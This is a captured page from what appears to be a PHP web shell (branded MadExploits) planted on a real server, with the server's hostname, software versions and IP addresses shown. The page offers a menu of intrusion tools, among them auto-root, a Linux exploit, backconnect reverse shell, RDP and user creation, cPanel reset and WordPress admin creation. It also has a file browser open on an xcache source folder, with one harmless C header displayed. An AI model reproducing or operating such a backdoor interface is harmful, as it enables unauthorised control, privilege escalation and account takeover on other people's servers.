Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
util /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
README
49
B
-rw-rw-r--
xc_align.h
445
B
-rw-rw-r--
xc_foreachcoresig.h
589
B
-rw-rw-r--
xc_stack.c
1.12
KB
-rw-rw-r--
xc_stack.h
507
B
-rw-rw-r--
xc_stack.lo
312
B
-rw-r--r--
xc_trace.c
619
B
-rw-rw-r--
xc_trace.h
1.25
KB
-rw-rw-r--
xc_trace.lo
312
B
-rw-r--r--
xc_vector.h
1.3
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xc_foreachcoresig.h
/* all signals generate coredump by default is list here */ #ifdef SIGABRT FOREACH_SIG(SIGABRT); #endif #ifdef SIGBUS FOREACH_SIG(SIGBUS); #endif #ifdef SIGEMT FOREACH_SIG(SIGEMT); #endif #ifdef SIGFPE FOREACH_SIG(SIGFPE); #endif #ifdef SIGILL FOREACH_SIG(SIGILL); #endif #ifdef SIGIOT FOREACH_SIG(SIGIOT); #endif #ifdef SIGQUIT FOREACH_SIG(SIGQUIT); #endif #ifdef SIGSEGV FOREACH_SIG(SIGSEGV); #endif #ifdef SIGSYS FOREACH_SIG(SIGSYS); #endif #ifdef SIGTRAP FOREACH_SIG(SIGTRAP); #endif #ifdef SIGXCPU FOREACH_SIG(SIGXCPU); #endif #ifdef SIGXFSZ FOREACH_SIG(SIGXFSZ); #endif
Close